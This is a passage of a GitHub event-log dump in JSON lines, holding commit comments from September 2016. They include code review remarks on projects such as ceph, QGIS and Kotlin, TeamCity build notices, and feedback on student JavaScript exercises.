`.C()`: you have to keep *all* old **C** code and add code of handling **R** objects.\r\n\r\n3. The major speed-up came from changing the test of permissible values within individual (`static`) dissimilarity functions. **vegan** used `R_FINITE` macro to check that numbers are OK before going calculations, and **analogue**  does the same. Changing this to `!ISNAN` will double the speed. I tested this both in Linux and in Mac, and the results were consistent. The `R_FINITE` macro checks for `NA`, `NaN`, `Inf` and `-Inf` and `ISNAN` checks only for `NA` and `NaN`. The results will differ only if input had infinities: in old code they were skipped, in new they will be used and give infinite dissimilarities. I think that the latter is even more correct. Usually the only difference is a huge speed-up. \r\n\r\n4. I promised three points, but here comes still one that I have not executed and may not execute. The compiled code can start faster if you register the methods. For this you should have marked non-public functions as `static` and only register non-`static` (i.e., `extern` in **C**) functions. However, in dissimilarities the time spent within function dominates over start-up and I'm not sure there is a need of taking this step. Registering functions increases the burden of maintenance as you must sync registration with changed functions. "}},"created_at":"2016-09-07T07:41:23Z"}
{"id":"4525949913","type":"CommitCommentEvent","actor":{"login":"veronikaslc"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":18924206,"position":92,"line":116,"path":"components/family-studies/api/src/main/java/org/phenotips/studies/family/listener/FamilyDeletingListener.java","commit_id":"bf592492e7e58e0ac9cc9f45e7a886d96a46be68","created_at":"2016-09-07T07:41:26Z","updated_at":"2016-09-07T07:41:26Z","body":"True"}},"created_at":"2016-09-07T07:41:26Z"}
{"id":"4525951408","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"rtyx/Exercises"},"payload":{"comment":{"id":18924207,"position":4,"line":4,"path":"wk2/day2/w2d2exer3.js","commit_id":"5976ee3521c851aeb352780f53e1f6e4cf4e8ede","created_at":"2016-09-07T07:41:48Z","updated_at":"2016-09-07T07:41:48Z","body":"Interesting!"}},"created_at":"2016-09-07T07:41:48Z"}
{"id":"4525951444","type":"CommitCommentEvent","actor":{"login":"fps01"},"repo":{"name":"DevGroup-ru/dotplant-store"},"payload":{"comment":{"id":18924208,"position":5,"line":198,"path":"src/models/goods/Goods.php","commit_id":"9f4dfc2de091fdab4019d1e6294d6e3410c1c06d","created_at":"2016-09-07T07:41:49Z","updated_at":"2016-09-07T07:41:49Z","body":"PRICE_TYPE_RETAIL => TYPE_RETAIL"}},"created_at":"2016-09-07T07:41:49Z"}
{"id":"4525954013","type":"CommitCommentEvent","actor":{"login":"BrunoWei"},"repo":{"name":"BrunoWei/ms_demo"},"payload":{"comment":{"id":18924212,"position":null,"line":null,"path":null,"commit_id":"c36de1e10baacbfaea33d9218c8a4f852405c8f9","created_at":"2016-09-07T07:42:28Z","updated_at":"2016-09-07T07:42:28Z","body":"TeamCity Ms Demo :: Build [Build 24](http://10.22.17.95:8111/viewLog.html?buildId=47&buildTypeId=MsDemo_Build) is now running\n"}},"created_at":"2016-09-07T07:42:28Z"}
{"id":"4525959403","type":"CommitCommentEvent","actor":{"login":"radhauma"},"repo":{"name":"radhauma/angular"},"payload":{"comment":{"id":18924227,"position":null,"line":null,"path":null,"commit_id":"b8c42ceaf44c9e0f8d52e8f1d997f24305b70caa","created_at":"2016-09-07T07:43:47Z","updated_at":"2016-09-07T07:43:47Z","body":"new "}},"created_at":"2016-09-07T07:43:47Z"}
{"id":"4525961526","type":"CommitCommentEvent","actor":{"login":"DelazJ"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18924234,"position":6,"line":103,"path":"python/core/qgsmaprendererjob.sip","commit_id":"02ae886d69ebe982db1a1dce27f42532ffc002f6","created_at":"2016-09-07T07:44:18Z","updated_at":"2016-09-07T07:44:18Z","body":"@m-kuhn typo on `required`"}},"created_at":"2016-09-07T07:44:18Z"}
{"id":"4525961599","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"bigmickeystyle/wk2"},"payload":{"comment":{"id":18924236,"position":4,"line":4,"path":"tuesday/tuesday3.js","commit_id":"c918d37728d3a5c61534a0dcd4989eda606494c7","created_at":"2016-09-07T07:44:19Z","updated_at":"2016-09-07T07:44:19Z","body":"Interesting way to do this"}},"created_at":"2016-09-07T07:44:19Z"}
{"id":"4525965969","type":"CommitCommentEvent","actor":{"login":"tchaikov"},"repo":{"name":"ceph/ceph"},"payload":{"comment":{"id":18924244,"position":5,"line":446,"path":"src/crush/mapper.c","commit_id":"5e0722fab5e548564a965b4af25d38f3eb106b49","created_at":"2016-09-07T07:45:22Z","updated_at":"2016-09-07T07:45:22Z","body":"@dachary it should be \r\n```c\r\nif (map->choose_tries && ftotal < map->choose_total_tries)\r\n```\r\ni think. because the maximum possible value of `ftotal` is `tries - 1`. which is `map->choose_total_tries + 1 - 1`, i.e. `map->choose_total_tries`. in the case, we are writing out of bound of allocated space."}},"created_at":"2016-09-07T07:45:22Z"}
{"id":"4525967173","type":"CommitCommentEvent","actor":{"login":"bska"},"repo":{"name":"OPM/ResInsight"},"payload":{"comment":{"id":18924251,"position":null,"line":null,"path":null,"commit_id":"8c67ee0a0d48325843d74243f0f1d2029c21689a","created_at":"2016-09-07T07:45:39Z","updated_at":"2016-09-07T07:45:39Z","body":"> We will need to look at it in more detail.\r\n\r\nJust to be clear, the issue I'm seeing here is different from the one I reported earlier (https://github.com/OPM/ResInsight/commit/0128baddff58ce3fc4eab843c4b00a21bfed0ce3#commitcomment-18852229).  The earlier issue was\r\n```\r\n(nearPlane > 0)\r\n```\r\nand this issue is\r\n```\r\n(farPlane > nearPlane)\r\n```\r\nThe two checks are in roughly the same location, but one line apart."}},"created_at":"2016-09-07T07:45:39Z"}
{"id":"4525968311","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"bigmickeystyle/wk2"},"payload":{"comment":{"id":18924255,"position":7,"line":7,"path":"tuesday/tuesday4.js","commit_id":"c918d37728d3a5c61534a0dcd4989eda606494c7","created_at":"2016-09-07T07:45:56Z","updated_at":"2016-09-07T07:45:56Z","body":"Very good to use the same event handler for both. Who cares if propagation is stopped by the handler attached to the outer one? "}},"created_at":"2016-09-07T07:45:56Z"}
{"id":"4525969272","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18924259,"position":150,"line":222,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/PropertyReferenceCodegen.kt","commit_id":"efe3675262654191a28c1708a325ef381d48e4b8","created_at":"2016-09-07T07:46:09Z","updated_at":"2016-09-07T07:46:09Z","body":"OK, I see"}},"created_at":"2016-09-07T07:46:09Z"}
{"id":"4525969455","type":"CommitCommentEvent","actor":{"login":"Rusty74"},"repo":{"name":"hitchcme/WSTF_Sniffer"},"payload":{"comment":{"id":18924260,"position":null,"line":null,"path":null,"commit_id":"19e42e667aa9cbfc84bc50ad5778531677435af6","created_at":"2016-09-07T07:46:13Z","updated_at":"2016-09-07T07:46:13Z","body":"haha NOT more data\r\n"}},"created_at":"2016-09-07T07:46:13Z"}
{"id":"4525972355","type":"CommitCommentEvent","actor":{"login":"szhua"},"repo":{"name":"szhua/AllTestDemos"},"payload":{"comment":{"id":18924263,"position":2,"line":2,"path":"README.md","commit_id":"36702b081a82d7618207d6ce41e66bb873eb9875","created_at":"2016-09-07T07:46:52Z","updated_at":"2016-09-07T07:46:52Z","body":"少时诵诗书"}},"created_at":"2016-09-07T07:46:52Z"}
{"id":"4525972943","type":"CommitCommentEvent","actor":{"login":"szhua"},"repo":{"name":"szhua/AllTestDemos"},"payload":{"comment":{"id":18924264,"position":2,"line":2,"path":"README.md","commit_id":"36702b081a82d7618207d6ce41e66bb873eb9875","created_at":"2016-09-07T07:47:01Z","updated_at":"2016-09-07T07:47:01Z","body":"谁是谁"}},"created_at":"2016-09-07T07:47:01Z"}
{"id":"4525974616","type":"CommitCommentEvent","actor":{"login":"szhua"},"repo":{"name":"szhua/AllTestDemos"},"payload":{"comment":{"id":18924269,"position":null,"line":null,"path":null,"commit_id":"36702b081a82d7618207d6ce41e66bb873eb9875","created_at":"2016-09-07T07:47:23Z","updated_at":"2016-09-07T07:47:23Z","body":"水水水水"}},"created_at":"2016-09-07T07:47:23Z"}
{"id":"4525975520","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"bigmickeystyle/wk2"},"payload":{"comment":{"id":18924271,"position":6,"line":6,"path":"tuesday/tuesday1.html","commit_id":"2d2ca55bc05331d642413f2132c19672b7d3ad20","created_at":"2016-09-07T07:47:38Z","updated_at":"2016-09-07T07:47:38Z","body":"Single quotes are allowed for attribute values but if you want to use them you should use them consistently. I think it is best to use double quotes always because it looks more normal. "}},"created_at":"2016-09-07T07:47:38Z"}
{"id":"4525980836","type":"CommitCommentEvent","actor":{"login":"m-kuhn"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18924281,"position":6,"line":103,"path":"python/core/qgsmaprendererjob.sip","commit_id":"02ae886d69ebe982db1a1dce27f42532ffc002f6","created_at":"2016-09-07T07:48:55Z","updated_at":"2016-09-07T07:48:55Z","body":"Thanks, fixed"}},"created_at":"2016-09-07T07:48:55Z"}
{"id":"4525981405","type":"CommitCommentEvent","actor":{"login":"solkimicreb"},"repo":{"name":"vivekimsit/nx-framework"},"payload":{"comment":{"id":18924283,"position":null,"line":null,"path":null,"commit_id":"c0812965a1c817710e0388cefe4706f9ed186171","created_at":"2016-09-07T07:49:04Z","updated_at":"2016-09-07T07:49:04Z","body":"To clarify it a bit, in my opinion the perfect handler would be:\r\n\r\n```javascript\r\nconst newValue = expression(state)\r\nif (isNormalAttribute) {\r\n  elem.setAttribute(name, newValue)\r\n}\r\nelse if (isBooleanAttribute) {\r\n  if (newValue) elem.setAttribute(name, name)\r\n  else elem.removeAttribute(name)\r\n}\r\n```\r\n\r\nI just don't know if the `isBooleanAttribute` check is possible or not."}},"created_at":"2016-09-07T07:49:04Z"}
{"id":"4525983363","type":"CommitCommentEvent","actor":{"login":"vliedel"},"repo":{"name":"crownstone/bluenet"},"payload":{"comment":{"id":18924285,"position":null,"line":null,"path":null,"commit_id":"66e0a6e4bb7a656679b0ae9e20df61c6ddf3a7e3","created_at":"2016-09-07T07:49:33Z","updated_at":"2016-09-07T07:49:33Z","body":"As far as I know, it should go to the config dir, to allow for multiple targets to have their own binaries."}},"created_at":"2016-09-07T07:49:33Z"}
{"id":"4525987518","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18924289,"position":null,"line":null,"path":null,"commit_id":"bd0ae64f54f50cc875711d3e2ceb6cc2790f3849","created_at":"2016-09-07T07:50:32Z","updated_at":"2016-09-07T07:50:32Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 937](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12779&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:11:26"}},"created_at":"2016-09-07T07:50:32Z"}
{"id":"4525991913","type":"CommitCommentEvent","actor":{"login":"Exulansis"},"repo":{"name":"jolocom/little-sister"},"payload":{"comment":{"id":18924299,"position":15,"line":443,"path":"src/js/lib/agents/graph.js","commit_id":"dac01dc9c721d82525c35f5b2e78e351f5febd58","created_at":"2016-09-07T07:51:33Z","updated_at":"2016-09-07T07:51:33Z","body":"The Uri that will be used to resolve the relative uris inside of the rdf file.\r\nFor instance\r\n`<axel> <img> </files/x.jpg>` that /files/x.jpg will be appended to the uri you pass to the parser."}},"created_at":"2016-09-07T07:51:33Z"}
{"id":"4525993688","type":"CommitCommentEvent","actor":{"login":"ArendPeter"},"repo":{"name":"HarvanC/WeatherOrNot"},"payload":{"comment":{"id":18924302,"position":1,"line":0,"path":".txt","commit_id":"3e95c8b5d19ecaaf2d26789f636355cb9515e89a","created_at":"2016-09-07T07:51:59Z","updated_at":"2016-09-07T07:51:59Z","body":"Sorry Phreak :(\n"}},"created_at":"2016-09-07T07:51:59Z"}
{"id":"4525994133","type":"CommitCommentEvent","actor":{"login":"mlen"},"repo":{"name":"hugsy/gef"},"payload":{"comment":{"id":18924304,"position":16,"line":6096,"path":"gef.py","commit_id":"f2575f42551359b9424748f1ef850e1dba4c9f3a","created_at":"2016-09-07T07:52:06Z","updated_at":"2016-09-07T07:52:06Z","body":"You don't need `,` inside of `[]`, it's only required for tuples"}},"created_at":"2016-09-07T07:52:06Z"}
{"id":"4525994311","type":"CommitCommentEvent","actor":{"login":"BrunoWei"},"repo":{"name":"BrunoWei/ms_demo"},"payload":{"comment":{"id":18924306,"position":null,"line":null,"path":null,"commit_id":"c20f6230bf3c0ed95d876f864da25d1edcde69ff","created_at":"2016-09-07T07:52:09Z","updated_at":"2016-09-07T07:52:09Z","body":"TeamCity Ms Demo :: Build [Build 25](http://10.22.17.95:8111/viewLog.html?buildId=48&buildTypeId=MsDemo_Build) is now running\n"}},"created_at":"2016-09-07T07:52:09Z"}
{"id":"4525996539","type":"CommitCommentEvent","actor":{"login":"rickynils"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18924311,"position":5,"line":32,"path":"nixos/modules/system/boot/stage-2-init.sh","commit_id":"a7a08188bf650ababa36300a9a6f34169e2a73bf","created_at":"2016-09-07T07:52:39Z","updated_at":"2016-09-07T07:52:39Z","body":"Implemented in https://github.com/NixOS/nixpkgs/pull/18388"}},"created_at":"2016-09-07T07:52:39Z"}
{"id":"4525997593","type":"CommitCommentEvent","actor":{"login":"rickynils"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18924314,"position":8,"line":41,"path":"modules/system/boot/stage-2-init.sh","commit_id":"bfe46a653ba2f8ff9902128f485cbd87c49cbca7","created_at":"2016-09-07T07:52:53Z","updated_at":"2016-09-07T07:52:53Z","body":"Implemented in https://github.com/NixOS/nixpkgs/pull/18388"}},"created_at":"2016-09-07T07:52:53Z"}
{"id":"4525997901","type":"CommitCommentEvent","actor":{"login":"BrunoWei"},"repo":{"name":"BrunoWei/ms_demo"},"payload":{"comment":{"id":18924315,"position":null,"line":null,"path":null,"commit_id":"c20f6230bf3c0ed95d876f864da25d1edcde69ff","created_at":"2016-09-07T07:52:57Z","updated_at":"2016-09-07T07:52:57Z","body":"TeamCity Ms Demo :: Build [Build 25](http://10.22.17.95:8111/viewLog.html?buildId=48&buildTypeId=MsDemo_Build) outcome was **SUCCESS**\nSummary: Tests passed: 6 Build time: 00:00:49"}},"created_at":"2016-09-07T07:52:57Z"}
{"id":"4525998442","type":"CommitCommentEvent","actor":{"login":"egamma"},"repo":{"name":"atian25/vscode-npm-scripts"},"payload":{"comment":{"id":18924316,"position":null,"line":null,"path":null,"commit_id":"a989bfb37fbede9ce6edd463aefc416c5b4bbda9","created_at":"2016-09-07T07:53:05Z","updated_at":"2016-09-07T07:53:05Z","body":"Looks good, please also document the option in the README.md"}},"created_at":"2016-09-07T07:53:05Z"}
{"id":"4526000470","type":"CommitCommentEvent","actor":{"login":"tchaikov"},"repo":{"name":"ceph/ceph"},"payload":{"comment":{"id":18924328,"position":5,"line":446,"path":"src/crush/mapper.c","commit_id":"5e0722fab5e548564a965b4af25d38f3eb106b49","created_at":"2016-09-07T07:53:33Z","updated_at":"2016-09-07T07:53:33Z","body":"i came across this when reviewing #10993."}},"created_at":"2016-09-07T07:53:33Z"}
{"id":"4526006979","type":"CommitCommentEvent","actor":{"login":"BowmanZone"},"repo":{"name":"BowmanZone/Apple-Swfit-Tec-For-Myself"},"payload":{"comment":{"id":18924341,"position":null,"line":null,"path":null,"commit_id":"4a32a986d5b3e1def5c6718cfa16186eeb22a3d1","created_at":"2016-09-07T07:55:06Z","updated_at":"2016-09-07T07:55:06Z","body":"真机无证书测试，修改Bundle ID进行测试"}},"created_at":"2016-09-07T07:55:06Z"}
{"id":"4526007124","type":"CommitCommentEvent","actor":{"login":"masyer"},"repo":{"name":"masyer/Hello_world"},"payload":{"comment":{"id":18924345,"position":2,"line":2,"path":"README.md","commit_id":"e377a33a0027a5837272774071a05dbfa655abdd","created_at":"2016-09-07T07:55:09Z","updated_at":"2016-09-07T07:55:09Z","body":"kjkh kjk"}},"created_at":"2016-09-07T07:55:09Z"}
{"id":"4526008838","type":"CommitCommentEvent","actor":{"login":"zhaiyu"},"repo":{"name":"zhaiyu/lepluslife_back"},"payload":{"comment":{"id":18924347,"position":null,"line":null,"path":null,"commit_id":"222a38b31aa1f6d802c929f3ab5d82cdc552cbec","created_at":"2016-09-07T07:55:32Z","updated_at":"2016-09-07T07:55:32Z","body":"Add datacenter \r\n        - controller :  MemberDataController.java\r\n        - service     :   MemberDataService.java\r\nAdd jsp\r\n       - datacenter:   dataCenter.jsp\r\n\r\nChange OffLineOrderRepostory.java\r\n      -  add a NativeQuery Method."}},"created_at":"2016-09-07T07:55:32Z"}
{"id":"4526013859","type":"CommitCommentEvent","actor":{"login":"edgarcadena"},"repo":{"name":"edgarcadena/Practicum"},"payload":{"comment":{"id":18924353,"position":null,"line":null,"path":null,"commit_id":"663a04f61d28dcd7413abf51067c6e692f0c5e49","created_at":"2016-09-07T07:56:44Z","updated_at":"2016-09-07T07:56:44Z","body":"[Source Code.zip](https://github.com/edgarcadena/Practicum/files/458558/Source.Code.zip)\r\n"}},"created_at":"2016-09-07T07:56:44Z"}
{"id":"4526014148","type":"CommitCommentEvent","actor":{"login":"beenokle"},"repo":{"name":"scalikejdbc/scalikejdbc-async"},"payload":{"comment":{"id":18924354,"position":null,"line":null,"path":null,"commit_id":"991b99f0bb3ca6ed7f8ca4bb44e4a02b9a31f6fa","created_at":"2016-09-07T07:56:48Z","updated_at":"2016-09-07T07:56:48Z","body":"I would not do this, because of this issue https://github.com/mauricio/postgresql-async/issues/179"}},"created_at":"2016-09-07T07:56:48Z"}
{"id":"4526015445","type":"CommitCommentEvent","actor":{"login":"edgarcadena"},"repo":{"name":"edgarcadena/Practicum"},"payload":{"comment":{"id":18924355,"position":null,"line":null,"path":null,"commit_id":"663a04f61d28dcd7413abf51067c6e692f0c5e49","created_at":"2016-09-07T07:57:08Z","updated_at":"2016-09-07T07:57:08Z","body":"Latest version"}},"created_at":"2016-09-07T07:57:08Z"}
{"id":"4526019070","type":"CommitCommentEvent","actor":{"login":"KimSanha"},"repo":{"name":"KimSanha/dgist"},"payload":{"comment":{"id":18924361,"position":3,"line":3,"path":"app/controllers/home_controller.rb","commit_id":"7bc0f286c12ef6d8d4a51441c15ea37753126725","created_at":"2016-09-07T07:57:57Z","updated_at":"2016-09-07T07:57:57Z","body":"dk dlrj xptmxmfh Wksrjdpdy"}},"created_at":"2016-09-07T07:57:57Z"}
{"id":"4526020433","type":"CommitCommentEvent","actor":{"login":"Fasse"},"repo":{"name":"Admidio/admidio"},"payload":{"comment":{"id":18924367,"position":null,"line":null,"path":null,"commit_id":"5e48908535bb93326eba5f51d048d444b7469ce4","created_at":"2016-09-07T07:58:18Z","updated_at":"2016-09-07T07:58:18Z","body":"Within update we ignore constraints, but maybe this will fail with PostgreSQL. I will Test this. In Installation process I got error with MySQL ."}},"created_at":"2016-09-07T07:58:18Z"}
{"id":"4526023297","type":"CommitCommentEvent","actor":{"login":"superzadeh"},"repo":{"name":"dtuma/processdash"},"payload":{"comment":{"id":18924376,"position":null,"line":null,"path":null,"commit_id":"cad6efa94eb6af02e4e7bf8399ea398cccf0d6e3","created_at":"2016-09-07T07:58:59Z","updated_at":"2016-09-07T07:58:59Z","body":"having this feature exposed over HTTP would be nice"}},"created_at":"2016-09-07T07:58:59Z"}
{"id":"4526027397","type":"CommitCommentEvent","actor":{"login":"ntatoo"},"repo":{"name":"msx752/NecroBot"},"payload":{"comment":{"id":18924384,"position":null,"line":null,"path":null,"commit_id":"11f3e0f36e70b57c4b186a80658728860222810e","created_at":"2016-09-07T07:59:55Z","updated_at":"2016-09-07T07:59:55Z","body":"@msx752 https://discord.gg/AmVC3qz join here"}},"created_at":"2016-09-07T07:59:55Z"}
{"id":"4526031593","type":"CommitCommentEvent","actor":{"login":"BrunoWei"},"repo":{"name":"BrunoWei/ms_demo"},"payload":{"comment":{"id":18924393,"position":null,"line":null,"path":null,"commit_id":"a7ae4edf7c799d57d69aadb66281c2927b1ec563","created_at":"2016-09-07T08:00:50Z","updated_at":"2016-09-07T08:00:50Z","body":"TeamCity Ms Demo :: Build [Build 26](http://10.22.17.95:8111/viewLog.html?buildId=49&buildTypeId=MsDemo_Build) is now running\n"}},"created_at":"2016-09-07T08:00:50Z"}
{"id":"4526033303","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"KarenNemeth/Spiced-Academy"},"payload":{"comment":{"id":18924397,"position":21,"line":21,"path":"wk2/DOM-Events/DOM-Event-1/DOM-Event-1.js","commit_id":"cc1500ec6fe9e00782cb60c9170f8ab69813bfbd","created_at":"2016-09-07T08:01:13Z","updated_at":"2016-09-07T08:01:13Z","body":"I mean, shouldn't it be happening in response to the mousemove. I think if you are seeing it work it is because you are actually setting the box's position 60 times a second with `requestAnimationFrame` whether or not the mouse has moved."}},"created_at":"2016-09-07T08:01:13Z"}
{"id":"4526034449","type":"CommitCommentEvent","actor":{"login":"BrunoWei"},"repo":{"name":"BrunoWei/ms_demo"},"payload":{"comment":{"id":18924399,"position":null,"line":null,"path":null,"commit_id":"a7ae4edf7c799d57d69aadb66281c2927b1ec563","created_at":"2016-09-07T08:01:28Z","updated_at":"2016-09-07T08:01:28Z","body":"TeamCity Ms Demo :: Build [Build 26](http://10.22.17.95:8111/viewLog.html?buildId=49&buildTypeId=MsDemo_Build) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 3 Build time: 00:00:40\n### Failed tests\n```\ncom.epam.clientprofolio.dao.ClientProfolioDaoTest.shouldGetClientProfolioById: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-07T08:01:28Z"}
{"id":"4526035823","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"KarenNemeth/Spiced-Academy"},"payload":{"comment":{"id":18924402,"position":16,"line":16,"path":"wk2/DOM-Events/DOM-Event-1/DOM-Event-1.html","commit_id":"cc1500ec6fe9e00782cb60c9170f8ab69813bfbd","created_at":"2016-09-07T08:01:45Z","updated_at":"2016-09-07T08:01:45Z","body":"I expect this to be in the body element"}},"created_at":"2016-09-07T08:01:45Z"}
{"id":"4526036064","type":"CommitCommentEvent","actor":{"login":"zhanghongxiacn"},"repo":{"name":"zhanghongxiacn/ProgrammingAssignment2"},"payload":{"comment":{"id":18924403,"position":8,"line":7,"path":"cachematrix.R","commit_id":"e4eed4153bd237a2dd4532fc3f40ce0e22fd0cb7","created_at":"2016-09-07T08:01:47Z","updated_at":"2016-09-07T08:01:47Z","body":"inverse <- NULL\r\n        set <- function(y){\r\n                x <<- y\r\n                inverse <<- NULL\r\n        }\r\n        get <- function(){\r\n                x\r\n        }\r\n        setinverse <- function(z){\r\n                inverse <<- z\r\n        }\r\n        getinverse <- function() {\r\n                inverse\r\n        }\r\n        list(set = set,get = get,setinverse = setinverse,getinverse = getinverse)"}},"created_at":"2016-09-07T08:01:47Z"}
{"id":"4526036637","type":"CommitCommentEvent","actor":{"login":"Deamonor"},"repo":{"name":"Testfirma1337/DASleet"},"payload":{"comment":{"id":18924404,"position":null,"line":null,"path":null,"commit_id":"492f229604430d1f1fd3ad13fd867cd6b47a7349","created_at":"2016-09-07T08:01:55Z","updated_at":"2016-09-07T08:01:55Z","body":"jaaaa allesso wie ichs haben wollte :dancer: "}},"created_at":"2016-09-07T08:01:55Z"}
{"id":"4526038501","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"KarenNemeth/Spiced-Academy"},"payload":{"comment":{"id":18924410,"position":15,"line":15,"path":"wk2/DOM-Events/DOM-Event-1/DOM-Event-1.js","commit_id":"cc1500ec6fe9e00782cb60c9170f8ab69813bfbd","created_at":"2016-09-07T08:02:22Z","updated_at":"2016-09-07T08:02:22Z","body":"I think you need to append 'px' to these for them to be efficacious"}},"created_at":"2016-09-07T08:02:22Z"}
{"id":"4526040456","type":"CommitCommentEvent","actor":{"login":"zhanghongxiacn"},"repo":{"name":"zhanghongxiacn/ProgrammingAssignment2"},"payload":{"comment":{"id":18924413,"position":15,"line":14,"path":"cachematrix.R","commit_id":"e4eed4153bd237a2dd4532fc3f40ce0e22fd0cb7","created_at":"2016-09-07T08:02:49Z","updated_at":"2016-09-07T08:02:49Z","body":"inverse <- x$getinverse()\r\n        if(!is.null(inverse)){\r\n                message(\"getting cached data\")\r\n                return(inverse)\r\n        }\r\n        data <- x$get()\r\n        inverse <- solve(data)\r\n        x$setinverse(inverse)\r\n        inverse"}},"created_at":"2016-09-07T08:02:49Z"}
{"id":"4526046554","type":"CommitCommentEvent","actor":{"login":"arax"},"repo":{"name":"delavei/diplomka"},"payload":{"comment":{"id":18924432,"position":5,"line":10,"path":"todo","commit_id":"c8281405bda325d81ac7efebe1cc1cf6e5f8e32f","created_at":"2016-09-07T08:04:18Z","updated_at":"2016-09-07T08:04:18Z","body":"Nemusis ich zbierat menej casto, OpenTSDB si to vyriesi sama. Ty budes stale dokola posielat rovnake data. OpenTSDB zisti, ze su rovnake a nebude ich ukladat."}},"created_at":"2016-09-07T08:04:18Z"}
{"id":"4526047662","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":18924435,"position":null,"line":null,"path":null,"commit_id":"f265fb1a67ef00bf18983c7d7b7636ece70613ef","created_at":"2016-09-07T08:04:34Z","updated_at":"2016-09-07T08:04:34Z","body":"@MichaelWallace30 \r\nWe should separate both the CRC and Parser in their own classes/files, so that we are not hardcoding them into Serial."}},"created_at":"2016-09-07T08:04:34Z"}
{"id":"4526049609","type":"CommitCommentEvent","actor":{"login":"YegorF2010"},"repo":{"name":"YegorF2010/site"},"payload":{"comment":{"id":18924436,"position":4,"line":4,"path":"index.html","commit_id":"875c0476658ba9da76607710c2be30110e7818cb","created_at":"2016-09-07T08:05:03Z","updated_at":"2016-09-07T08:05:03Z","body":"hello)"}},"created_at":"2016-09-07T08:05:03Z"}
{"id":"4526053870","type":"CommitCommentEvent","actor":{"login":"BkSouX"},"repo":{"name":"FountainJS/generator-fountain-gulp"},"payload":{"comment":{"id":18924446,"position":null,"line":null,"path":null,"commit_id":"4bf94eb8eda4c2c43489fdefe880b9efbaebb1fc","created_at":"2016-09-07T08:06:01Z","updated_at":"2016-09-07T08:06:01Z","body":"Hi @micaelmbagira , what happened to the angular templatecache ? I can't find where it's gone.\r\nBruno"}},"created_at":"2016-09-07T08:06:01Z"}
{"id":"4526054979","type":"CommitCommentEvent","actor":{"login":"eva20166"},"repo":{"name":"eva20166/urlOrigin"},"payload":{"comment":{"id":18924448,"position":5,"line":5,"path":"README.md","commit_id":"f5b838ae183209118bb85cb645186490e0dc30cf","created_at":"2016-09-07T08:06:17Z","updated_at":"2016-09-07T08:06:17Z","body":"shfhfdgh\r\nagadgf\r\nag\r\n\r\n\r\nertdgfdg"}},"created_at":"2016-09-07T08:06:17Z"}
{"id":"4526055958","type":"CommitCommentEvent","actor":{"login":"jairovengoechea"},"repo":{"name":"Bookt/Kigo-Sites-WordPress-Theme-Pack"},"payload":{"comment":{"id":18924454,"position":71,"line":64,"path":"instaparent/inc/MarketAreasTable.php","commit_id":"5fcd952eb70551e08e8ea1eb056c9e8224452cdf","created_at":"2016-09-07T08:06:29Z","updated_at":"2016-09-07T08:06:29Z","body":"I accidentaly erased the $year and $month vars that came out from parsing the \"m\" parameter from the request.\r\nI made a new commit adding those again. All these args are needed to get, order, and filter the elements in the table."}},"created_at":"2016-09-07T08:06:29Z"}
{"id":"4526058527","type":"CommitCommentEvent","actor":{"login":"YegorF2010"},"repo":{"name":"YegorF2010/site"},"payload":{"comment":{"id":18924465,"position":null,"line":null,"path":null,"commit_id":"875c0476658ba9da76607710c2be30110e7818cb","created_at":"2016-09-07T08:07:08Z","updated_at":"2016-09-07T08:07:08Z","body":"hello))))"}},"created_at":"2016-09-07T08:07:08Z"}
{"id":"4526062650","type":"CommitCommentEvent","actor":{"login":"Infante007"},"repo":{"name":"ingbrzy/MA-XML-8.0-SPANISH"},"payload":{"comment":{"id":18924472,"position":null,"line":null,"path":null,"commit_id":"1f35885a084e553338fc9c5a9f07c618633e3540","created_at":"2016-09-07T08:08:04Z","updated_at":"2016-09-07T08:08:04Z","body":"¿La línea 12?"}},"created_at":"2016-09-07T08:08:04Z"}
{"id":"4526068121","type":"CommitCommentEvent","actor":{"login":"dpmramesh"},"repo":{"name":"sabose/ovirt-site"},"payload":{"comment":{"id":18924485,"position":77,"line":77,"path":"source/develop/release-management/features/gluster/gluster-dr.html.md","commit_id":"70e2e036df0474f955e3c93b6c4ed9cefdf416bc","created_at":"2016-09-07T08:09:17Z","updated_at":"2016-09-07T08:09:17Z","body":"Just a suggestion. How about change this to enable_dr?. "}},"created_at":"2016-09-07T08:09:17Z"}
